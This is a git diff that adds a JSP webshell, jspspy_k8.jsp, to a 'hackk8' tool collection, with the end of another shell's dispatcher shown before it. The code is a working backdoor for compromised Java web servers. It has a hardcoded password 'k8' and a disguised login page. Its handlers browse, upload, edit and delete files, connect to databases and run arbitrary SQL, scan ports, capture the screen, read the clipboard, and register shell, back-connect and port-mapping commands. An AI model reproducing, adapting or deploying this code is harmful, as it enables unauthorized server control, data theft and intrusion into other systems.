+ins.put("copy",new CopyInvoker()); +ins.put("bottom",new BottomInvoker()); +ins.put("vCreateFile",new VCreateFileInvoker()); +ins.put("vEdit",new VEditInvoker()); +ins.put("createFile",new CreateFileInvoker()); +ins.put("vEditProperty",new VEditPropertyInvoker()); +ins.put("editProperty",new EditPropertyInvoker()); +ins.put("vs",new VsInvoker()); +ins.put("shell",new ShellInvoker()); +ins.put("down",new DownInvoker()); +ins.put("vd",new VdInvoker()); +ins.put("downRemote",new DownRemoteInvoker()); +ins.put("index",new IndexInvoker()); +ins.put("mkdir",new MkDirInvoker()); +ins.put("move",new MoveInvoker()); +ins.put("removedir",new RemoteDirInvoker()); +ins.put("packBatch",new PackBatchInvoker()); +ins.put("pack",new PackInvoker()); +ins.put("unpack",new UnPackInvoker()); +ins.put("vmp",new VmpInvoker()); +ins.put("vbc",new VbcInvoker()); +ins.put("backConnect",new BackConnectInvoker()); +ins.put("jspEnv",new JspEnvInvoker()); +ins.put("smp",new SmpInvoker()); +ins.put("mapPort",new MapPortInvoker()); +ins.put("top",new TopInvoker()); +ins.put("vso",new VOnLineShellInvoker()); +ins.put("online",new OnLineInvoker()); +} +%> +<% +try { +String o = request.getParameter("o"); +if (!Util.isEmpty(o)) { +Invoker in = ins.get(o); +if (in == null) { +response.sendRedirect(SHELL_NAME+"?o=index"); +} else { +if (in.doBefore()) { +String path = request.getParameter("folder"); +if (!Util.isEmpty(path)) +session.setAttribute(CURRENT_DIR,path); +ins.get("before").invoke(request,response,session); +ins.get("script").invoke(request,response,session); +ins.get("top").invoke(request,response,session); +} +in.invoke(request,response,session); +if (!in.doAfter()) { +return; +}else{ +ins.get("bottom").invoke(request,response,session); +ins.get("after").invoke(request,response,session); +} +} +} else { +response.sendRedirect(SHELL_NAME+"?o=index"); +} +} catch (Exception e) { +ByteArrayOutputStream bout = new ByteArrayOutputStream(); +e.printStackTrace(new PrintStream(bout)); +session.setAttribute(CURRENT_DIR,SHELL_DIR); +Util.outMsg(out,Util.htmlEncode(new String(bout.toByteArray())).replace("\n","
    "),"left"); +bout.close(); +out.flush(); +ins.get("bottom").invoke(request,response,session); +ins.get("after").invoke(request,response,session); +} +%> diff --git a/jsp/hackk8/JSP/other/jspspy_k8.jsp b/jsp/hackk8/JSP/other/jspspy_k8.jsp new file mode 100644 index 0000000..4cd20f1 --- /dev/null +++ b/jsp/hackk8/JSP/other/jspspy_k8.jsp @@ -0,0 +1,2323 @@ +<%@page pageEncoding="UTF-8"%> +<%@page import="java.io.*"%> +<%@page import="java.util.*"%> +<%@page import="java.util.regex.*"%> +<%@page import="java.sql.*"%> +<%@page import="java.nio.charset.*"%> +<%@page import="javax.servlet.http.HttpServletRequestWrapper"%> +<%@page import="java.text.*"%> +<%@page import="java.net.*"%> +<%@page import="java.util.zip.*"%> +<%@page import="java.awt.*"%> +<%@page import="java.awt.image.*"%> +<%@page import="javax.imageio.*"%> +<%@page import="java.awt.datatransfer.DataFlavor"%> +<%@page import="java.util.prefs.Preferences"%> +<%! +private static final String PW = "k8"; +private static final String PW_SESSION_ATTRIBUTE = "JspSpyPwd"; +private static final String REQUEST_CHARSET = "ISO-8859-1"; +private static final String PAGE_CHARSET = "UTF-8"; +private static final String CURRENT_DIR = "currentdir"; +private static final String MSG = "SHOWMSG"; +private static final String PORT_MAP = "PMSA"; +private static final String DBO = "DBO"; +private static final String SHELL_ONLINE = "SHELL_ONLINE"; +private static String SHELL_NAME = ""; +private static String WEB_ROOT = null; +private static String SHELL_DIR = null; +public static Map ins = new HashMap(); +private static class MyRequest extends HttpServletRequestWrapper { +public MyRequest(HttpServletRequest req) { +super(req); +} +public String getParameter(String name) { +try { +String value = super.getParameter(name); +if (name == null) +return null; +return new String(value.getBytes(REQUEST_CHARSET),PAGE_CHARSET); +} catch (Exception e) { +return null; +} +} +} +private static class DBOperator{ +private Connection conn = null; +private Statement stmt = null; +private String driver; +private String url; +private String uid; +private String pwd; +public DBOperator(String driver,String url,String uid,String pwd) throws Exception { +this(driver,url,uid,pwd,false); +} +public DBOperator(String driver,String url,String uid,String pwd,boolean connect) throws Exception { +Class.forName(driver); +if (connect) +this.conn = DriverManager.getConnection(url,uid,pwd); +this.url = url; +this.driver = driver; +this.uid = uid; +this.pwd = pwd; +} +public void connect() throws Exception{ +this.conn = DriverManager.getConnection(url,uid,pwd); +} +public Object execute(String sql) throws Exception { +if (isValid()) { +stmt = conn.createStatement(); +if (stmt.execute(sql)) { +return stmt.getResultSet(); +} else { +return stmt.getUpdateCount(); +} +} +throw new Exception("Connection is inValid."); +} +public void closeStmt() throws Exception{ +if (this.stmt != null) +stmt.close(); +} +public boolean isValid() throws Exception { +return conn != null && !conn.isClosed(); +} +public void close() throws Exception { +if (isValid()) { +closeStmt(); +conn.close(); +} +} +public boolean equals(Object o) { +if (o instanceof DBOperator) { +DBOperator dbo = (DBOperator)o; +return this.driver.equals(dbo.driver) && this.url.equals(dbo.url) && this.uid.equals(dbo.uid) && this.pwd.equals(dbo.pwd); +} +return false; +} +} +private static class StreamConnector extends Thread { +private InputStream is; +private OutputStream os; +public StreamConnector( InputStream is, OutputStream os ){ +this.is = is; +this.os = os; +} +public void run(){ +BufferedReader in = null; +BufferedWriter out = null; +try{ +in = new BufferedReader( new InputStreamReader(this.is)); +out = new BufferedWriter( new OutputStreamWriter(this.os)); +char buffer[] = new char[8192]; +int length; +while((length = in.read( buffer, 0, buffer.length ))>0){ +out.write( buffer, 0, length ); +out.flush(); +} +} catch(Exception e){} +try{ +if(in != null) +in.close(); +if(out != null) +out.close(); +} catch( Exception e ){} +} +} +private static class OnLineProcess { +private String cmd = "first"; +private Process pro; +public OnLineProcess(Process p){ +this.pro = p; +} +public void setPro(Process p) { +this.pro = p; +} +public void setCmd(String c){ +this.cmd = c; + +} +public String getCmd(){ +return this.cmd; +} +public Process getPro(){ +return this.pro; +} +public void stop(){ +this.pro.destroy(); +} +} +private static class OnLineConnector extends Thread { +private OnLineProcess ol = null; +private InputStream is; +private OutputStream os; +private String name; +public OnLineConnector( InputStream is, OutputStream os ,String name,OnLineProcess ol){ +this.is = is; +this.os = os; +this.name = name; +this.ol = ol; +} +public void run(){ +BufferedReader in = null; +BufferedWriter out = null; +try{ +in = new BufferedReader( new InputStreamReader(this.is)); +out = new BufferedWriter( new OutputStreamWriter(this.os)); +char buffer[] = new char[128]; +if(this.name.equals("exeRclientO")) { +//from exe to client +int length = 0; +while((length = in.read( buffer, 0, buffer.length ))>0){ +String str = new String(buffer, 0, length); +str = str.replace("&","&").replace("<","<").replace(">",">"); +str = str.replace(""+(char)13+(char)10,"
    "); +str = str.replace("\n","
    "); +out.write(str.toCharArray(), 0, str.length()); +out.flush(); +} +} else { +//from client to exe +while(true) { +while(this.ol.getCmd() == null) { +Thread.sleep(500); +} +if (this.ol.getCmd().equals("first")) { +this.ol.setCmd(null); +continue; +} +this.ol.setCmd(this.ol.getCmd() + (char)10); +char[] arr = this.ol.getCmd().toCharArray(); +out.write(arr,0,arr.length); +out.flush(); +this.ol.setCmd(null); +} +} +} catch(Exception e){ +} +try{ +if(in != null) +in.close(); +if(out != null) +out.close(); +} catch( Exception e ){ +} +} +} +private static class Table{ +private ArrayList rows = null; +private boolean echoTableTag = false; +public void setEchoTableTag(boolean v) { +this.echoTableTag = v; +} +public Table(){ +this.rows = new ArrayList(); +} +public void addRow(Row r) { +this.rows.add(r); +} +public String toString(){ +StringBuilder html = new StringBuilder(); +if (echoTableTag) +html.append(""); +for (Row r:rows) { +html.append(""); +for (Column c:r.getColumns()) { +html.append(""); +} +html.append(""); +} +if (echoTableTag) +html.append("
    "); +String vv = Util.htmlEncode(Util.getStr(c.getValue())); +if (vv.equals("")) +vv = " "; +html.append(vv); +html.append("
    "); +return html.toString(); +} +} +private static class Row{ +private ArrayList cols = null; +public Row(){ +this.cols = new ArrayList(); +} +public void addColumn(Column n) { +this.cols.add(n); +} +public ArrayList getColumns(){ +return this.cols; +} +} +private static class Column{ +private String value; +public Column(String v){ +this.value = v; +} +public String getValue(){ +return this.value; +} +} +private static class Util{ +public static boolean isEmpty(String s) { +return s == null || s.trim().equals(""); +} +public static boolean isEmpty(Object o) { +return o == null || isEmpty(o.toString()); +} +public static String getSize(long size,char danwei) { +if (danwei == 'M') { +double v = formatNumber(size / 1024.0 / 1024.0,2); +if (v > 1024) { +return getSize(size,'G'); +}else { +return v + "M"; +} +} else if (danwei == 'G') { +return formatNumber(size / 1024.0 / 1024.0 / 1024.0,2)+"G"; +} else if (danwei == 'K') { +double v = formatNumber(size / 1024.0,2); +if (v > 1024) { +return getSize(size,'M'); +} else { +return v + "K"; +} +} else if (danwei == 'B') { +if (size > 1024) { +return getSize(size,'K'); +}else { +return size + "B"; +} +} +return ""+0+danwei; +} +public static double formatNumber(double value,int l) { +NumberFormat format = NumberFormat.getInstance(); +format.setMaximumFractionDigits(l); +format.setGroupingUsed(false); +return new Double(format.format(value)); +} +public static boolean isInteger(String v) { +if (isEmpty(v)) +return false; +return v.matches("^\\d+$"); +} +public static String formatDate(long time) { +SimpleDateFormat format = new SimpleDateFormat("yyyy-MM-dd hh:mm:ss"); +return format.format(new java.util.Date(time)); +} +public static String convertPath(String path) { +return path != null ? path.replace("\\","/") : ""; +} +public static String htmlEncode(String v) { +if (isEmpty(v)) +return ""; +return v.replace("&","&").replace("<","<").replace(">",">"); +} +public static String getStr(String s) { +return s == null ? "" :s; +} +public static String getStr(Object s) { +return s == null ? "" :s.toString(); +} +public static String exec(String regex, String str, int group) { +Pattern pat = Pattern.compile(regex); +Matcher m = pat.matcher(str); +if (m.find()) +return m.group(group); +return null; +} +public static void outMsg(Writer out,String msg) throws Exception { +outMsg(out,msg,"center"); +} +public static void outMsg(Writer out,String msg,String align) throws Exception { +if (msg.indexOf("java.lang.ClassNotFoundException") != -1) +msg = "Can Not Find The Driver!
    " + msg; +out.write("
    "+msg+"
    "); +} +} +private static class UploadBean { +private String fileName = null; +private String suffix = null; +private String savePath = ""; +private ServletInputStream sis = null; +private byte[] b = new byte[1024]; +public UploadBean() { +} +public void setSavePath(String path) { +this.savePath = path; +} +public void parseRequest(HttpServletRequest request) throws IOException { +sis = request.getInputStream(); +int a = 0; +int k = 0; +String s = ""; +while ((a = sis.readLine(b,0,b.length))!= -1) { +s = new String(b, 0, a,PAGE_CHARSET); +if ((k = s.indexOf("filename=\""))!= -1) { +s = s.substring(k + 10); +k = s.indexOf("\""); +s = s.substring(0, k); +File tF = new File(s); +if (tF.isAbsolute()) { +fileName = tF.getName(); +} else { +fileName = s; +} +k = s.lastIndexOf("."); +suffix = s.substring(k + 1); +upload(); +} +} +} +private void upload() { +try { +FileOutputStream out = new FileOutputStream(new File(savePath,fileName)); +int a = 0; +int k = 0; +String s = ""; +while ((a = sis.readLine(b,0,b.length))!=-1) { +s = new String(b, 0, a); +if ((k = s.indexOf("Content-Type:"))!=-1) { +break; +} +} +sis.readLine(b,0,b.length); +while ((a = sis.readLine(b,0,b.length)) != -1) { +s = new String(b, 0, a); +if ((b[0] == 45) && (b[1] == 45) && (b[2] == 45) && (b[3] == 45) && (b[4] == 45)) { +break; +} +out.write(b, 0, a); +} +out.close(); +} catch (IOException ioe) { +ioe.printStackTrace(); +} +} +} +%> +<% +SHELL_NAME = request.getServletPath().substring(request.getServletPath().lastIndexOf("/")+1); +String myAbsolutePath = application.getRealPath(request.getServletPath()); +if (Util.isEmpty(myAbsolutePath)) {//for weblogic +SHELL_NAME = request.getServletPath(); +myAbsolutePath = new File(application.getResource("/").getPath()+SHELL_NAME).toString(); +SHELL_NAME=request.getContextPath()+SHELL_NAME; +WEB_ROOT = new File(application.getResource("/").getPath()).toString(); +} else { +WEB_ROOT = application.getRealPath("/"); +} +SHELL_DIR = Util.convertPath(myAbsolutePath.substring(0,myAbsolutePath.lastIndexOf(File.separator))); +if (session.getAttribute(CURRENT_DIR) == null) +session.setAttribute(CURRENT_DIR,Util.convertPath(SHELL_DIR)); +request = new MyRequest(request); +if (session.getAttribute(PW_SESSION_ATTRIBUTE) == null || !(session.getAttribute(PW_SESSION_ATTRIBUTE)).equals(PW)) { +String o = request.getParameter("o"); +if (o != null && o.equals("login")) { +ins.get("login").invoke(request,response,session); +return; +} else if (o != null && o.equals("vLogin")) { +ins.get("vLogin").invoke(request,response,session); +return; +} else { +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +return; +} +} +%> +<%! +private static interface Invoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception; +public boolean doBefore(); +public boolean doAfter(); +} +private static class DefaultInvoker implements Invoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { +} +public boolean doBefore(){ +return true; +} +public boolean doAfter() { +return true; +} +} +private static class ScriptInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); + +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BeforeInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(" "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class AfterInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DeleteBatchInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String files = request.getParameter("files"); +if (!Util.isEmpty(files)) { +String currentDir = JSession.getAttribute(CURRENT_DIR).toString(); +String[] arr = files.split(","); +for (String fs:arr) { +File f = new File(currentDir,fs); +f.delete(); +} +} +JSession.setAttribute(MSG,"Delete Files Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class ClipBoardInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""+ +" "+ +" "+ +" "+ +"
    "+ +"

    System Clipboard »

    "+ +"

    ");
+try{
+out.println(Util.htmlEncode(Util.getStr(Toolkit.getDefaultToolkit().getSystemClipboard().getData(DataFlavor.stringFlavor))));
+}catch (Exception ex) {
+out.println("ClipBoard is Empty Or Is Not Text Data !");
+}
+out.println("
    "+ +" "+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VRemoteControlInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +out.println(""+ +" "+ +" "+ +" "+ +"
    "+ +"

    Remote Control »

    "+ +" Speed(Second , dont be so fast) Can Not Control Yet."+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//GetScreen +private static class GcInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Dimension size = Toolkit.getDefaultToolkit().getScreenSize(); +Rectangle rec = new Rectangle(0,0,(int)size.getWidth(),(int)size.getHeight()); +BufferedImage img = new Robot().createScreenCapture(rec); +response.setContentType("image/jpeg"); +ImageIO.write(img,"jpg",response.getOutputStream()); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VPortScanInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String ip = request.getParameter("ip"); +String ports = request.getParameter("ports"); +String timeout = request.getParameter("timeout"); +if (Util.isEmpty(ip)) +ip = "127.0.0.1"; +if (Util.isEmpty(ports)) +ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"; +if (Util.isEmpty(timeout)) +timeout = "2"; +out.println("
    "+ +"

    PortScan >>

    "+ +"
    "+ +"

    "+ +"IP : Port : Timeout (秒) : "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class PortScanInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +ins.get("vPortScan").invoke(request,response,JSession); +String ip = request.getParameter("ip"); +String ports = request.getParameter("ports"); +String timeout = request.getParameter("timeout"); +int iTimeout = 0; +if (Util.isEmpty(ip) || Util.isEmpty(ports)) +return; +if (!Util.isInteger(timeout)) { +timeout = "2"; +} +iTimeout = Integer.parseInt(timeout); +Map rs = new LinkedHashMap(); +String[] portArr = ports.split(","); +for (String port:portArr) { +try { +Socket s = new Socket(); +s.connect(new InetSocketAddress(ip,Integer.parseInt(port)),iTimeout); +s.close(); +rs.put(port,"Open"); +} catch (Exception e) { +rs.put(port,"Close"); +} +} +out.println("
    "); +Set> entrySet = rs.entrySet(); +for (Map.Entry e:entrySet) { +String port = e.getKey(); +String value = e.getValue(); +out.println(ip+" : "+port+" ................................. "+value+"
    "); +} +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VConnInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object obj = JSession.getAttribute(DBO); +if (obj == null || !((DBOperator)obj).isValid()) { +out.println(" "); +out.println("
    "+ +"
    "+ +""+ +"

    DataBase Manager »

    "+ +""+ +"

    "+ +"Driver:"+ +" "+ +"URL:"+ +""+ +"UID:"+ +""+ +"PWD:"+ +""+ +"DataBase:"+ +" "+ +""+ +"

    "+ +"
    "); +} else { +ins.get("dbc").invoke(request,response,JSession); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//DBConnect +private static class DbcInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String driver = request.getParameter("driver"); +String url = request.getParameter("url"); +String uid = request.getParameter("uid"); +String pwd = request.getParameter("pwd"); +String sql = request.getParameter("sql"); +String selectDb = request.getParameter("selectDb"); +if (selectDb == null) +selectDb = JSession.getAttribute("selectDb").toString(); +else +JSession.setAttribute("selectDb",selectDb); +Object dbo = JSession.getAttribute(DBO); +if (dbo == null || !((DBOperator)dbo).isValid()) { +if (dbo != null) +((DBOperator)dbo).close(); +dbo = new DBOperator(driver,url,uid,pwd,true); +} else { +if (!Util.isEmpty(driver) && !Util.isEmpty(url) && !Util.isEmpty(uid)) { +DBOperator oldDbo = (DBOperator)dbo; +dbo = new DBOperator(driver,url,uid,pwd); +if (!oldDbo.equals(dbo)) { +((DBOperator)oldDbo).close(); +((DBOperator)dbo).connect(); +} else { +dbo = oldDbo; +} +} +} +DBOperator Ddbo = (DBOperator)dbo; +JSession.setAttribute(DBO,Ddbo); +Util.outMsg(out,"Connect To DataBase Success!"); +out.println(" "); +out.println("
    "+ +"
    "+ +""+ +"

    DataBase Manager »

    "+ +""+ +"

    "+ +"Driver:"+ +" "+ +"URL:"+ +""+ +"UID:"+ +""+ +"PWD:"+ +""+ +"DataBase:"+ +" "+ +""+ +"

    "+ +"
    "); +out.println("
    "+ +"

    Run SQL query/queries on database :

    "); +} catch (Exception e) { +//e.printStackTrace(); +throw e; +} +} +} +private static class ExecuteSQLInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String sql = request.getParameter("sql"); +String db = request.getParameter("selectDb"); +Object dbo = JSession.getAttribute(DBO); +if (!Util.isEmpty(sql)) { +if (dbo == null || !((DBOperator)dbo).isValid()) { +response.sendRedirect(SHELL_NAME+"?o=vConn"); +} else { +ins.get("dbc").invoke(request,response,JSession); +Object obj = ((DBOperator)dbo).execute(sql); +if (obj instanceof ResultSet) { +ResultSet rs = (ResultSet)obj; +ResultSetMetaData meta = rs.getMetaData(); +int colCount = meta.getColumnCount(); +out.println("

    Query#0 : "+Util.htmlEncode(sql)+"

    "); +out.println(""); +for (int i=1;i<=colCount;i++) { +out.println(""); +} +out.println(""); +Table tb = new Table(); +while(rs.next()) { +Row r = new Row(); +for (int i = 1;i<=colCount;i++) { +r.addColumn(new Column(rs.getString(i))); +} +tb.addRow(r); +} +out.println(tb.toString()); +out.println("
    "+meta.getColumnName(i)+"
    "+meta.getColumnTypeName(i)+"
    "); +rs.close(); +((DBOperator)dbo).closeStmt(); +} else { +out.println("

    affected rows : "+obj+"

    "); +} +} +} else { +ins.get("dbc").invoke(request,response,JSession); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VLoginInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("
    "+ +"

    Password: "+ +" "+ +" "+ +" "+ +"

    "+ +" "+ +"Copyright © 2012 Admin www.baidu.com

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class LoginInvoker extends DefaultInvoker{ +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String inputPw = request.getParameter("pw"); +if (Util.isEmpty(inputPw) || !inputPw.equals(PW)) { +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +return; +} else { +JSession.setAttribute(PW_SESSION_ATTRIBUTE,inputPw); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MyComparator implements Comparator{ +public int compare(File f1,File f2) { +if (f1 != null && f2!= null) { +if (f1.isDirectory()) { +if (f2.isDirectory()) { +return f1.getName().compareTo(f2.getName()); +} else { +return -1; +} +} else { +if (f2.isDirectory()) { +return 1; +} else { +return f1.getName().compareTo(f2.getName()); +} +} +} +return 0; +} +} +private static class FileListInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("folder"); +if (Util.isEmpty(path)) +path = JSession.getAttribute(CURRENT_DIR).toString(); + +JSession.setAttribute(CURRENT_DIR,Util.convertPath(path)); +File file = new File(path); +if (!file.exists()) { +throw new Exception(path+"Dont Exists !"); +} +JSession.setAttribute(CURRENT_DIR,path); +File[] list = file.listFiles(); +Arrays.sort(list,new MyComparator()); +out.println("
    "); +String cr = null; +try { +cr = JSession.getAttribute(CURRENT_DIR).toString().substring(0,3); +}catch(Exception e) { +cr = "/"; +} +File currentRoot = new File(cr); +out.println("

    File Manager - Current disk ""+(cr.indexOf("/") == 0?"/":currentRoot.getPath())+"" total (unknow)

    "); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Current Directory
    "+ +"
    "); +out.println(""+ +""+ +""+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +""); +if (file.getParent() != null) { +out.println(""+ +""+ +""+ +""); +} +int dircount = 0; +int filecount = 0; +for (File f:list) { +if (f.isDirectory()) { +dircount ++; +out.println(""+ +""+ +""+ +""+ +""+ +""+ +""+ +""); +} else { +filecount++; +out.println(""+ +""+ +""+ +""+ +""+ +""+ +""+ +""); +} +} +out.println(""+ +" "+ +" "+ +"
    "+ +"
    "+ +"Web Root"+ +" | Shell Directory"+ +" | New Directory | New File"+ +" | "); +File[] roots = file.listRoots(); +for (int i = 0;iDisk("+Util.convertPath(r.getPath())+")"); +if (i != roots.length -1) { +out.println("|"); +} +} +out.println("
     NameLast ModifiedSizeRead/Write/Execute 
    =Goto Parent
    0"+f.getName()+""+Util.formatDate(f.lastModified())+"--"+f.canRead()+" / "+f.canWrite()+" / unknow Del | Move | Pack
    "+f.getName()+""+Util.formatDate(f.lastModified())+""+Util.getSize(f.length(),'B')+""+ +""+f.canRead()+" / "+f.canWrite()+" / unknow "+ +"Edit | "+ +"Down | "+ +"Copy | "+ +"Move | "+ +"Property"); +if (f.getName().endsWith(".zip")) { +out.println(" | UnPack"); +} else if (f.getName().endsWith(".rar")) { +out.println(" | UnPack"); +} else { +out.println(" | Pack"); +} +out.println("
     Pack Selected - Delete Selected"+dircount+" directories / "+filecount+" files
    "); +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +} +private static class LogoutInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object dbo = JSession.getAttribute(DBO); +if (dbo != null) +((DBOperator)dbo).close(); +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +Object online = JSession.getAttribute(SHELL_ONLINE); +if (online != null) +((OnLineProcess)online).stop(); +JSession.invalidate(); +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class UploadInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +UploadBean fileBean = new UploadBean(); +response.getWriter().println(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.setSavePath(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.parseRequest(request); +JSession.setAttribute(MSG,"Upload File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class CopyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String src = request.getParameter("src"); +String to = request.getParameter("to"); +BufferedInputStream input = new BufferedInputStream(new FileInputStream(new File(src))); +BufferedOutputStream output = new BufferedOutputStream(new FileOutputStream(new File(to))); +byte[] d = new byte[1024]; +int len = input.read(d); +while(len != -1) { +output.write(d,0,len); +len = input.read(d); +} +output.close(); +input.close(); +JSession.setAttribute(MSG,"Copy File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BottomInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +response.getWriter().println("
    Copyright (C) 2009 http://www.baidu.com/  [T00ls.Net] All Rights Reserved."+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VCreateFileInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +File f = new File(path); +if (!f.isAbsolute()) { +String oldPath = path; +path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path+="/"; +path+=oldPath; +f = new File(path); +f.createNewFile(); +} else { +f.createNewFile(); +} +out.println("
    "+ +"
    "+ +"

    Create / Edit File »

    "+ +""+ +"

    Current File (import new file name and new file)

    "+ +"

    File Content

    "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VEditInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +File f = new File(path); +if (f.exists()) { +BufferedReader reader = new BufferedReader(new FileReader(f)); +StringBuilder content = new StringBuilder(); +String s = reader.readLine(); +while (s != null) { +content.append(s+"\r\n"); +s = reader.readLine(); +} +reader.close(); +out.println("
    "+ +"
    "+ +"

    Create / Edit File »

    "+ +""+ +"

    Current File (import new file name and new file)

    "+ +"

    File Content

    "+ +"

    "+ +"
    "+ +"
    "); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class CreateFileInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +String content = request.getParameter("filecontent"); + +BufferedWriter outs = new BufferedWriter(new FileWriter(new File(path))); +outs.write(content,0,content.length()); +outs.close(); +JSession.setAttribute(MSG,"Save File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VEditPropertyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String filepath = request.getParameter("filepath"); +File f = new File(filepath); +if (!f.exists()) +return; +String read = f.canRead() ? "checked=\"checked\"" : ""; +String write = f.canWrite() ? "checked=\"checked\"" : ""; +String execute = ""; +Calendar cal = Calendar.getInstance(); +cal.setTimeInMillis(f.lastModified()); + +out.println("
    "+ +"
    "+ +"

    Set File Property »

    "+ +"

    Current file (fullpath)

    "+ +" "+ +"

    Read: "+ +" "+ +" Write: "+ +" "+ +" Execute: "+ +" "+ +"

    "+ +"

